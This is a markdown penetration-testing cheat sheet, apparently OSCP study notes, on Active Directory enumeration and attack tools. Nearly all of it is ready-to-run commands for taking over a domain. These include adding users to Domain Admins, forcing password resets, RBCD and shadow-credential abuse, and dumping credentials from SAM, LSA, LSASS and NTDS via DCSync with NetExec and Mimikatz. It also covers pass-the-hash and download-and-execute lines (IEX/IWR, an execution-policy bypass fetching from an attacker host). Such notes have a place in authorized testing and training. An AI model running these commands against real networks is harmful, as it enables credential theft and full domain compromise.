3.8.AD-Enumeration-Tools.md

AD Enumeration Tools

Table of Contents

• BloodHound & SharpHound
• bloodyAD
• adPEAS
• NetExec (nxc)
• Invoke-ADEnum
• ADRecon
• PowerView (PowerSploit)
• Mimikatz

---

BloodHound & SharpHound

Quick Check (One-liner)

# Kali: Start BloodHound and collect data
sudo bloodhound &
# On target Windows: Run SharpHound
powershell -ep bypass -c "Import-Module .\SharpHound.ps1; Invoke-BloodHound -CollectionMethod All"

https://bloodhound.specterops.io/

BloodHound is an AD visualization and attack path finder. SharpHound is the data collector.

Kali Linux Paths

# SharpHound location
/usr/share/sharphound
├── SharpHound.exe
├── SharpHound.exe.config
├── SharpHound.pdb
└── SharpHound.ps1

# PowerSploit/PowerView location
/usr/share/windows-resources/powersploit
└── Recon/PowerView.ps1

# Mimikatz location
/usr/share/windows-resources/mimikatz
├── Win32/mimikatz.exe
└── x64/mimikatz.exe

# PEASS (linpeas/winpeas)
/usr/share/peass/linpeas
/usr/share/peass/winpeas

Installation (Kali)

# Install BloodHound Community Edition
sudo apt update && sudo apt install -y bloodhound

# Setup BloodHound (first time only)
sudo bloodhound-setup

# Start BloodHound
sudo bloodhound

⚠️ PostgreSQL Collation Fix (if setup fails):

# Start PostgreSQL
sudo systemctl start postgresql
sudo systemctl enable postgresql

# Fix collation version
sudo runuser -u postgres -- psql -c 'ALTER DATABASE postgres REFRESH COLLATION VERSION;'
sudo runuser -u postgres -- psql -c 'ALTER DATABASE template1 REFRESH COLLATION VERSION;'

# Retry setup
sudo bloodhound-setup

SharpHound Data Collection

Copy SharpHound to target

# From Kali
cp /usr/share/sharphound/SharpHound.ps1 ~/Desktop/
python3 -m http.server 80

On Target Windows (PowerShell)

# Download and import
iwr -Uri "http://KALI_IP/SharpHound.ps1" -OutFile SharpHound.ps1
powershell -ep bypass

# Import module
. .\SharpHound.ps1

# Collect all data
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\

# Alternative: Use EXE directly
.\SharpHound.exe -c All --outputdirectory C:\Temp\

Collection Methods

Method	Description
All	All collection methods
Default	Group, LocalAdmin, Session, Trusts
DCOnly	Only from Domain Controllers
Group	Group memberships
LocalAdmin	Local admin rights
Session	Session data
LoggedOn	Logged on users
Trusts	Domain trusts
ACL	ACL data

Import Data to BloodHound

# Transfer ZIP from target to Kali
# In BloodHound GUI: Upload Data → Select ZIP file

Useful Queries

Pre-built queries in BloodHound

Query	Description
Find all Domain Admins	List all DA users
Shortest Path to DA	Find attack path
Kerberoastable Accounts	Users with SPNs
AS-REP Roastable Users	No pre-auth required
Unconstrained Delegation	Dangerous machines

Custom Cypher Queries

# Find all Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u.name, u.serviceprincipalnames

# Find computers with unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c.name

# Shortest path from owned to DA
MATCH p=shortestPath((n {owned:true})-[*1..]->(g:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p

---

bloodyAD

bloodyAD One-liner

# Quick AD enumeration with multiple tools
bloodyAD -u $user -p $pass -d $domain --host $rhost get writable && nxc smb $rhost -u $user -p $pass --users

https://github.com/CravateRouge/bloodyAD

bloodyAD is a powerful Active Directory privilege escalation framework.

Installation

pip install bloodyAD
# or
git clone https://github.com/CravateRouge/bloodyAD
cd bloodyAD && pip install .

Basic Usage

# With password
bloodyAD -u $username -p '$password' -d $domain --host $rhost <command>

# With NTLM hash
bloodyAD -u $username -p ':$nthash' -d $domain --host $rhost <command>

# With Kerberos
export KRB5CCNAME=ticket.ccache
bloodyAD -u $username -d $domain --host $rhost -k <command>

Enumeration

# Get domain info
bloodyAD -u $username -p '$password' -d $domain --host $rhost get info

# Get all users
bloodyAD -u $username -p '$password' -d $domain --host $rhost get users

# Get all computers
bloodyAD -u $username -p '$password' -d $domain --host $rhost get computers

# Get object attributes
bloodyAD -u $username -p '$password' -d $domain --host $rhost getObjectAttributes $target_user

# Get writable objects
bloodyAD -u $username -p '$password' -d $domain --host $rhost getObjectsInOU "DC=domain,DC=local" --writableOnly

ACL Abuse

# Add user to group
bloodyAD -u $username -p '$password' -d $domain --host $rhost add groupMember "Domain Admins" $target_user

# Force password change (ForceChangePassword)
bloodyAD -u $username -p '$password' -d $domain --host $rhost set password $target_user 'NewPassword123!'

# Write owner
bloodyAD -u $username -p '$password' -d $domain --host $rhost set owner $target_object $username

# Add GenericAll
bloodyAD -u $username -p '$password' -d $domain --host $rhost add genericAll $target_object $username

RBCD Attack

# Add RBCD
bloodyAD -u $username -p '$password' -d $domain --host $rhost add rbcd '$target_computer$' '$controlled_computer$'

# Remove RBCD
bloodyAD -u $username -p '$password' -d $domain --host $rhost del rbcd '$target_computer$' '$controlled_computer$'

Shadow Credentials

# Add Shadow Credential
bloodyAD -u $username -p '$password' -d $domain --host $rhost add shadowCredentials $target

# Remove Shadow Credential
bloodyAD -u $username -p '$password' -d $domain --host $rhost del shadowCredentials $target

Computer Account

# Add computer account
bloodyAD -u $username -p '$password' -d $domain --host $rhost add computer 'YOURPC$' 'Password123!'

# Get machine account quota
bloodyAD -u $username -p '$password' -d $domain --host $rhost getMAQ

---

adPEAS

https://github.com/61106960/adPEAS

PowerShell script for Active Directory enumeration.

adPEAS Basic Usage

# Import module
Import-Module .\adPEAS.ps1

# Run all checks
Invoke-adPEAS

# Output to file
Invoke-adPEAS -OutputPath C:\temp\adpeas_results

Specific Modules

# Domain enumeration
Invoke-adPEAS -Module Domain

# User enumeration
Invoke-adPEAS -Module User

# Computer enumeration
Invoke-adPEAS -Module Computer

# Kerberos attacks
Invoke-adPEAS -Module Kerberos

# Delegation issues
Invoke-adPEAS -Module Delegation

# ACL abuse
Invoke-adPEAS -Module ACL

# GPO abuse
Invoke-adPEAS -Module GPO

# Certificate attacks
Invoke-adPEAS -Module Certs

---

NetExec (nxc)

https://github.com/Pennyw0rth/NetExec

Modern network execution tool (formerly CrackMapExec).

NetExec Installation

pip install netexec
# or
pipx install netexec

Authentication

# Password
nxc smb $rhost -u $username -p '$password'

# NTLM hash
nxc smb $rhost -u $username -H $nthash

# Kerberos
nxc smb $rhost -u $username -p '$password' -k

# Multiple targets
nxc smb $cidr -u $username -p '$password'

SMB Enumeration

# Enumerate shares
nxc smb $rhost -u $username -p '$password' --shares

# Spider shares
nxc smb $rhost -u $username -p '$password' --spider C$ --depth 2

# User enumeration
nxc smb $rhost -u $username -p '$password' --users

# Get password policy
nxc smb $rhost -u $username -p '$password' --pass-pol

LDAP Enumeration

# General info
nxc ldap $rhost -u $username -p '$password'

# ASREPRoast
nxc ldap $rhost -u $username -p '$password' --asreproast output.txt

# Kerberoast
nxc ldap $rhost -u $username -p '$password' --kerberoast output.txt

# Get users with description
nxc ldap $rhost -u $username -p '$password' -M get-desc-users

# Find unconstrained delegation
nxc ldap $rhost -u $username -p '$password' --trusted-for-delegation

# AD CS enumeration
nxc ldap $rhost -u $username -p '$password' -M adcs

Credential Dumping

# SAM dump
nxc smb $rhost -u $username -p '$password' --sam

# LSA secrets
nxc smb $rhost -u $username -p '$password' --lsa

# NTDS.dit (DCSync)
nxc smb $rhost -u $username -p '$password' --ntds

# LSASS dump
nxc smb $rhost -u $username -p '$password' -M lsassy
nxc smb $rhost -u $username -p '$password' -M nanodump

Modules

# List modules
nxc smb -L
nxc ldap -L

# Petitpotam
nxc smb $rhost -u $username -p '$password' -M petitpotam

# WebDAV
nxc smb $rhost -u $username -p '$password' -M webdav

# Impersonate
nxc smb $rhost -u $username -p '$password' -M impersonate

---

Invoke-ADEnum

https://github.com/Leo4j/Invoke-ADEnum

Invoke-ADEnum Usage

IEX(IWR https://raw.githubusercontent.com/Leo4j/Invoke-ADEnum/main/Invoke-ADEnum.ps1 -UseBasicParsing)

# Run enumeration
Invoke-ADEnum

# Specific domain
Invoke-ADEnum -Domain $domain -Server $rhost

---

ADRecon

https://github.com/adrecon/ADRecon

ADRecon Usage

# Run full recon
.\ADRecon.ps1

# Output to specific folder
.\ADRecon.ps1 -OutputDir C:\temp\adrecon

# Generate Excel report
.\ADRecon.ps1 -GenExcel C:\temp\adrecon

# Specific domain
.\ADRecon.ps1 -DomainController $rhost -Credential (Get-Credential)

---

Quick Reference

Tool Selection

Task	Best Tool
Attack path visualization	BloodHound
AD data collection	SharpHound
Quick enumeration	NetExec
ACL abuse	bloodyAD
Comprehensive scan	adPEAS
Report generation	ADRecon
Credential dumping	Mimikatz
AD enumeration	PowerView

Common Commands

# NetExec - Quick wins
nxc smb $rhost -u $username -p '$password' --shares --users

# bloodyAD - Password change
bloodyAD -u $user -p $pass -d $domain --host $rhost set password victim 'NewPass123!'

# bloodyAD - Add to group
bloodyAD -u $user -p $pass -d $domain --host $rhost add groupMember "Domain Admins" $victim

# SharpHound - Collect all data
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Temp\

---

PowerView (PowerSploit)

https://github.com/PowerShellMafia/PowerSploit

Kali Path

/usr/share/windows-resources/powersploit/Recon/PowerView.ps1

PowerView Usage

# Import module
powershell -ep bypass
Import-Module .\PowerView.ps1

# Domain enumeration
Get-NetDomain
Get-NetDomainController

# User enumeration
Get-NetUser
Get-NetUser | select cn,pwdlastset,lastlogon
Get-NetUser -SPN  # Kerberoastable users

# Group enumeration
Get-NetGroup | select cn
Get-NetGroup "Domain Admins" | select member
Get-DomainGroupMember "Domain Admins"

# Computer enumeration
Get-NetComputer
Get-DomainComputer | select operatingsystem,name

# Find local admin access
Find-LocalAdminAccess

# Find shares
Find-DomainShare
Find-DomainShare -CheckShareAccess

# Session enumeration
Get-NetSession -ComputerName $hostname

---

Mimikatz

https://github.com/gentilkiwi/mimikatz

Mimikatz Kali Path

/usr/share/windows-resources/mimikatz
├── Win32/mimikatz.exe
└── x64/mimikatz.exe

Mimikatz Basic Usage

# Run mimikatz
.\mimikatz.exe

# Enable debug privilege
privilege::debug

# Elevate to SYSTEM
token::elevate

Mimikatz Credential Dumping

# Dump SAM (local accounts)
lsadump::sam

# Dump LSA secrets
lsadump::secrets

# Dump cached credentials
lsadump::cache

# Dump logon passwords (plaintext if available)
sekurlsa::logonpasswords

# Dump NTLM hashes
sekurlsa::msv

# Dump Kerberos tickets
sekurlsa::tickets /export

One-liner Commands

# Quick credential dump
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Dump SAM
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# DCSync attack (requires DA or replication rights)
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:$domain /user:Administrator" "exit"

Pass-the-Hash

# PTH with mimikatz
sekurlsa::pth /user:Administrator /domain:$domain /ntlm:$hash /run:cmd.exe

---

See Also

• AD Exploitation - Complete AD attack methodology
• Kerberos Attacks - Kerberoasting, ASREPRoast
• NTLM Relay - Responder and relay attacks
• Shadow Credentials - bloodyAD shadow credentials
• Kerberos Delegation - Delegation attacks
• OSCP Exam Guide - Exam methodology